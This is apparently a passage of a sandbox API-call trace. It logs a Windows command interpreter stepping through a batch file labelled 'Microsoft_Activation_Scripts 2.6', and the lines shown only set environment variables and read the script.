[0177.476] _wcsnicmp (_String1="_P", _String2="/P", _MaxCount=0x2) returned 48 [0177.476] SetEnvironmentVariableW (lpName="_PSarg", lpValue="\"\"\"C:\\Windows\\Temp\\MAS_15344413.cmd\"\"\" -el ") returned 1 [0177.476] GetProcessHeap () returned 0x19a8f1e0000 [0177.477] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2029e0) returned 1 [0177.477] GetEnvironmentStringsW () returned 0x19a8f2029e0* [0177.477] GetProcessHeap () returned 0x19a8f1e0000 [0177.477] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xf5e) returned 0x19a8f203950 [0177.477] memcpy (in: _Dst=0x19a8f203950, _Src=0x19a8f2029e0, _Size=0xf5e | out: _Dst=0x19a8f203950) returned 0x19a8f203950 [0177.477] FreeEnvironmentStringsA (penv="=") returned 1 [0177.477] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.477] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.478] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.478] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.478] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.478] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.479] SetConsoleInputExeNameW () returned 0x1 [0177.479] GetConsoleOutputCP () returned 0x1b5 [0177.479] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.479] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.480] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.480] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.480] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.480] SetFilePointer (in: hFile=0x84, lDistanceToMove=4689, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1251 [0177.480] GetProcessHeap () returned 0x19a8f1e0000 [0177.481] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0177.481] GetProcessHeap () returned 0x19a8f1e0000 [0177.482] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eee20) returned 1 [0177.482] GetProcessHeap () returned 0x19a8f1e0000 [0177.482] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef2a0) returned 1 [0177.482] GetProcessHeap () returned 0x19a8f1e0000 [0177.483] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec7c0) returned 1 [0177.483] GetProcessHeap () returned 0x19a8f1e0000 [0177.483] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0177.483] GetProcessHeap () returned 0x19a8f1e0000 [0177.484] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8760) returned 1 [0177.484] GetProcessHeap () returned 0x19a8f1e0000 [0177.485] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f86a0) returned 1 [0177.485] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.485] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1251 [0177.486] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.486] SetFilePointer (in: hFile=0x84, lDistanceToMove=4691, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1253 [0177.486] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nt _PSarg=\"\"\"%~f0\"\"\" -el %_args%\r\nwork:~0,-1%\"\r\ne\r\n======================================================================================\r\n") returned 2 [0177.486] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.486] GetFileType (hFile=0x84) returned 0x1 [0177.486] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.486] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1253 [0177.486] GetProcessHeap () returned 0x19a8f1e0000 [0177.486] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f2048c0 [0177.486] GetProcessHeap () returned 0x19a8f1e0000 [0177.487] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2048c0) returned 1 [0177.487] _tell (_FileHandle=3) returned 4691 [0177.487] _close (_FileHandle=3) returned 0 [0177.488] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.488] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.488] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.488] SetFilePointer (in: hFile=0x84, lDistanceToMove=4691, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1253 [0177.488] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.488] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1253 [0177.488] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.488] SetFilePointer (in: hFile=0x84, lDistanceToMove=4738, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1282 [0177.488] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_ttemp=%userprofile%\\AppData\\Local\\Temp\"\r\n", cbMultiByte=47, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"_ttemp=%userprofile%\\AppData\\Local\\Temp\"\r\n\r\ne\r\n======================================================================================\r\n") returned 47 [0177.488] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.488] GetFileType (hFile=0x84) returned 0x1 [0177.489] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.489] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1282 [0177.489] GetProcessHeap () returned 0x19a8f1e0000 [0177.489] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f2048c0 [0177.490] GetProcessHeap () returned 0x19a8f1e0000 [0177.490] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f2088e0 [0177.490] GetProcessHeap () returned 0x19a8f1e0000 [0177.490] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb860 [0177.490] GetEnvironmentVariableW (in: lpName="userprofile", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x15 [0177.490] GetProcessHeap () returned 0x19a8f1e0000 [0177.490] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0177.490] GetProcessHeap () returned 0x19a8f1e0000 [0177.491] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2088e0) returned 1 [0177.491] GetProcessHeap () returned 0x19a8f1e0000 [0177.491] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2048c0) returned 1 [0177.492] _wcsicmp (_String1="set", _String2=")") returned 74 [0177.492] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0177.492] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0177.492] _wcsicmp (_String1="IF", _String2="set") returned -10 [0177.492] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0177.492] _wcsicmp (_String1="REM", _String2="set") returned -1 [0177.492] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0177.492] GetProcessHeap () returned 0x19a8f1e0000 [0177.492] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0177.492] GetProcessHeap () returned 0x19a8f1e0000 [0177.492] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecbe0 [0177.492] GetProcessHeap () returned 0x19a8f1e0000 [0177.492] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x76) returned 0x19a8f1eed20 [0177.492] _tell (_FileHandle=3) returned 4738 [0177.492] _close (_FileHandle=3) returned 0 [0177.493] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.493] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.493] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.493] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.493] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.493] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.493] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.493] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.493] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.493] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.493] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.493] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.494] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.494] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.494] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.494] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.494] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.494] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.494] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.494] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.494] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.494] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.494] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.494] GetProcessHeap () returned 0x19a8f1e0000 [0177.494] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xdc) returned 0x19a8f1fc6b0 [0177.494] GetProcessHeap () returned 0x19a8f1e0000 [0177.494] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1fc6b0, Size=0x76) returned 0x19a8f1ef3a0 [0177.494] GetProcessHeap () returned 0x19a8f1e0000 [0177.494] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ef3a0) returned 0x76 [0177.494] wcsncmp (_String1="\"_tt", _String2="/", _MaxCount=0x4) returned -13 [0177.494] GetProcessHeap () returned 0x19a8f1e0000 [0177.494] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x7e) returned 0x19a8f1eaed0 [0177.494] _wcsnicmp (_String1="\"_", _String2="/A", _MaxCount=0x2) returned -13 [0177.495] _wcsnicmp (_String1="\"_", _String2="/P", _MaxCount=0x2) returned -13 [0177.495] SetEnvironmentVariableW (lpName="_ttemp", lpValue="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 1 [0177.495] GetProcessHeap () returned 0x19a8f1e0000 [0177.496] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203950) returned 1 [0177.496] GetEnvironmentStringsW () returned 0x19a8f1ffdd0* [0177.496] GetProcessHeap () returned 0x19a8f1e0000 [0177.496] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f2029e0 [0177.496] memcpy (in: _Dst=0x19a8f2029e0, _Src=0x19a8f1ffdd0, _Size=0xfbe | out: _Dst=0x19a8f2029e0) returned 0x19a8f2029e0 [0177.496] FreeEnvironmentStringsA (penv="=") returned 1 [0177.496] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.496] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.496] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.497] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.497] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.497] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.497] SetConsoleInputExeNameW () returned 0x1 [0177.497] GetConsoleOutputCP () returned 0x1b5 [0177.498] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.498] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.498] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.498] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.498] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.498] SetFilePointer (in: hFile=0x84, lDistanceToMove=4738, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1282 [0177.499] GetProcessHeap () returned 0x19a8f1e0000 [0177.499] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0177.499] GetProcessHeap () returned 0x19a8f1e0000 [0177.500] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef3a0) returned 1 [0177.500] GetProcessHeap () returned 0x19a8f1e0000 [0177.500] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eed20) returned 1 [0177.500] GetProcessHeap () returned 0x19a8f1e0000 [0177.500] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecbe0) returned 1 [0177.500] GetProcessHeap () returned 0x19a8f1e0000 [0177.501] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0177.501] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.501] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1282 [0177.501] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.501] SetFilePointer (in: hFile=0x84, lDistanceToMove=4740, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1284 [0177.501] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nt \"_ttemp=%userprofile%\\AppData\\Local\\Temp\"\r\n\r\ne\r\n======================================================================================\r\n") returned 2 [0177.501] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.502] GetFileType (hFile=0x84) returned 0x1 [0177.502] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.502] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1284 [0177.502] GetProcessHeap () returned 0x19a8f1e0000 [0177.502] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f205890 [0177.502] GetProcessHeap () returned 0x19a8f1e0000 [0177.503] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f205890) returned 1 [0177.503] _tell (_FileHandle=3) returned 4740 [0177.503] _close (_FileHandle=3) returned 0 [0177.504] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.504] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.504] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.504] SetFilePointer (in: hFile=0x84, lDistanceToMove=4740, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1284 [0177.504] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.504] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1284 [0177.504] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.504] SetFilePointer (in: hFile=0x84, lDistanceToMove=4773, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12a5 [0177.504] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="setlocal EnableDelayedExpansion\r\n", cbMultiByte=33, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="setlocal EnableDelayedExpansion\r\n\\Local\\Temp\"\r\n\r\ne\r\n======================================================================================\r\n") returned 33 [0177.505] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.505] GetFileType (hFile=0x84) returned 0x1 [0177.505] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.505] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12a5 [0177.505] GetProcessHeap () returned 0x19a8f1e0000 [0177.505] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f205890 [0177.505] GetProcessHeap () returned 0x19a8f1e0000 [0177.506] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f205890) returned 1 [0177.507] _wcsicmp (_String1="setlocal", _String2=")") returned 74 [0177.507] _wcsicmp (_String1="FOR", _String2="setlocal") returned -13 [0177.507] _wcsicmp (_String1="FOR/?", _String2="setlocal") returned -13 [0177.507] _wcsicmp (_String1="IF", _String2="setlocal") returned -10 [0177.507] _wcsicmp (_String1="IF/?", _String2="setlocal") returned -10 [0177.507] _wcsicmp (_String1="REM", _String2="setlocal") returned -1 [0177.507] _wcsicmp (_String1="REM/?", _String2="setlocal") returned -1 [0177.507] GetProcessHeap () returned 0x19a8f1e0000 [0177.507] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee610 [0177.507] GetProcessHeap () returned 0x19a8f1e0000 [0177.507] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb7d0 [0177.507] GetProcessHeap () returned 0x19a8f1e0000 [0177.507] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f8eb0 [0177.507] _tell (_FileHandle=3) returned 4773 [0177.507] _close (_FileHandle=3) returned 0 [0177.508] _wcsicmp (_String1="setlocal", _String2="DIR") returned 15 [0177.508] _wcsicmp (_String1="setlocal", _String2="ERASE") returned 14 [0177.508] _wcsicmp (_String1="setlocal", _String2="DEL") returned 15 [0177.508] _wcsicmp (_String1="setlocal", _String2="TYPE") returned -1 [0177.508] _wcsicmp (_String1="setlocal", _String2="COPY") returned 16 [0177.508] _wcsicmp (_String1="setlocal", _String2="CD") returned 16 [0177.508] _wcsicmp (_String1="setlocal", _String2="CHDIR") returned 16 [0177.508] _wcsicmp (_String1="setlocal", _String2="RENAME") returned 1 [0177.508] _wcsicmp (_String1="setlocal", _String2="REN") returned 1 [0177.508] _wcsicmp (_String1="setlocal", _String2="ECHO") returned 14 [0177.508] _wcsicmp (_String1="setlocal", _String2="SET") returned 108 [0177.508] _wcsicmp (_String1="setlocal", _String2="PAUSE") returned 3 [0177.508] _wcsicmp (_String1="setlocal", _String2="DATE") returned 15 [0177.508] _wcsicmp (_String1="setlocal", _String2="TIME") returned -1 [0177.508] _wcsicmp (_String1="setlocal", _String2="PROMPT") returned 3 [0177.508] _wcsicmp (_String1="setlocal", _String2="MD") returned 6 [0177.508] _wcsicmp (_String1="setlocal", _String2="MKDIR") returned 6 [0177.508] _wcsicmp (_String1="setlocal", _String2="RD") returned 1 [0177.508] _wcsicmp (_String1="setlocal", _String2="RMDIR") returned 1 [0177.508] _wcsicmp (_String1="setlocal", _String2="PATH") returned 3 [0177.508] _wcsicmp (_String1="setlocal", _String2="GOTO") returned 12 [0177.508] _wcsicmp (_String1="setlocal", _String2="SHIFT") returned -3 [0177.508] _wcsicmp (_String1="setlocal", _String2="CLS") returned 16 [0177.508] _wcsicmp (_String1="setlocal", _String2="CALL") returned 16 [0177.508] _wcsicmp (_String1="setlocal", _String2="VERIFY") returned -3 [0177.509] _wcsicmp (_String1="setlocal", _String2="VER") returned -3 [0177.509] _wcsicmp (_String1="setlocal", _String2="VOL") returned -3 [0177.509] _wcsicmp (_String1="setlocal", _String2="EXIT") returned 14 [0177.509] _wcsicmp (_String1="setlocal", _String2="SETLOCAL") returned 0 [0177.509] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.509] _wcsicmp (_String1="setlocal", _String2="DIR") returned 15 [0177.509] _wcsicmp (_String1="setlocal", _String2="ERASE") returned 14 [0177.509] _wcsicmp (_String1="setlocal", _String2="DEL") returned 15 [0177.509] _wcsicmp (_String1="setlocal", _String2="TYPE") returned -1 [0177.509] _wcsicmp (_String1="setlocal", _String2="COPY") returned 16 [0177.509] _wcsicmp (_String1="setlocal", _String2="CD") returned 16 [0177.509] _wcsicmp (_String1="setlocal", _String2="CHDIR") returned 16 [0177.509] _wcsicmp (_String1="setlocal", _String2="RENAME") returned 1 [0177.510] _wcsicmp (_String1="setlocal", _String2="REN") returned 1 [0177.510] _wcsicmp (_String1="setlocal", _String2="ECHO") returned 14 [0177.510] _wcsicmp (_String1="setlocal", _String2="SET") returned 108 [0177.510] _wcsicmp (_String1="setlocal", _String2="PAUSE") returned 3 [0177.510] _wcsicmp (_String1="setlocal", _String2="DATE") returned 15 [0177.510] _wcsicmp (_String1="setlocal", _String2="TIME") returned -1 [0177.510] _wcsicmp (_String1="setlocal", _String2="PROMPT") returned 3 [0177.510] _wcsicmp (_String1="setlocal", _String2="MD") returned 6 [0177.510] _wcsicmp (_String1="setlocal", _String2="MKDIR") returned 6 [0177.510] _wcsicmp (_String1="setlocal", _String2="RD") returned 1 [0177.510] _wcsicmp (_String1="setlocal", _String2="RMDIR") returned 1 [0177.510] _wcsicmp (_String1="setlocal", _String2="PATH") returned 3 [0177.510] _wcsicmp (_String1="setlocal", _String2="GOTO") returned 12 [0177.510] _wcsicmp (_String1="setlocal", _String2="SHIFT") returned -3 [0177.510] _wcsicmp (_String1="setlocal", _String2="CLS") returned 16 [0177.510] _wcsicmp (_String1="setlocal", _String2="CALL") returned 16 [0177.510] _wcsicmp (_String1="setlocal", _String2="VERIFY") returned -3 [0177.510] _wcsicmp (_String1="setlocal", _String2="VER") returned -3 [0177.510] _wcsicmp (_String1="setlocal", _String2="VOL") returned -3 [0177.510] _wcsicmp (_String1="setlocal", _String2="EXIT") returned 14 [0177.510] _wcsicmp (_String1="setlocal", _String2="SETLOCAL") returned 0 [0177.510] GetProcessHeap () returned 0x19a8f1e0000 [0177.510] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x70) returned 0x19a8f1ef3a0 [0177.510] GetProcessHeap () returned 0x19a8f1e0000 [0177.511] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ef3a0, Size=0x40) returned 0x19a8f1f93b0 [0177.511] GetProcessHeap () returned 0x19a8f1e0000 [0177.511] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f93b0) returned 0x40 [0177.511] GetProcessHeap () returned 0x19a8f1e0000 [0177.511] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x52) returned 0x19a8f1f8d00 [0177.511] GetProcessHeap () returned 0x19a8f1e0000 [0177.511] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec7e0 [0177.511] GetProcessHeap () returned 0x19a8f1e0000 [0177.511] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb7a0 [0177.511] GetProcessHeap () returned 0x19a8f1e0000 [0177.511] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x8) returned 0x19a8f1e6140 [0177.511] GetEnvironmentStringsW () returned 0x19a8f1ffdd0* [0177.511] GetProcessHeap () returned 0x19a8f1e0000 [0177.511] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f205890 [0177.512] memcpy (in: _Dst=0x19a8f205890, _Src=0x19a8f1ffdd0, _Size=0xfbe | out: _Dst=0x19a8f205890) returned 0x19a8f205890 [0177.512] FreeEnvironmentStringsA (penv="=") returned 1 [0177.512] GetProcessHeap () returned 0x19a8f1e0000 [0177.512] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x70) returned 0x19a8f1eeda0 [0177.512] GetProcessHeap () returned 0x19a8f1e0000 [0177.512] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eeda0, Size=0x40) returned 0x19a8f1f8fa0 [0177.512] GetProcessHeap () returned 0x19a8f1e0000 [0177.512] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f8fa0) returned 0x40 [0177.512] _wcsicmp (_String1="EnableDelayedExpansion", _String2="ENABLEEXTENSIONS") returned -1 [0177.512] _wcsicmp (_String1="EnableDelayedExpansion", _String2="DISABLEEXTENSIONS") returned 1 [0177.512] _wcsicmp (_String1="EnableDelayedExpansion", _String2="ENABLEDELAYEDEXPANSION") returned 0 [0177.512] GetProcessHeap () returned 0x19a8f1e0000 [0177.513] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8eb0) returned 1 [0177.513] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.513] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.513] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.513] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.514] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.514] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 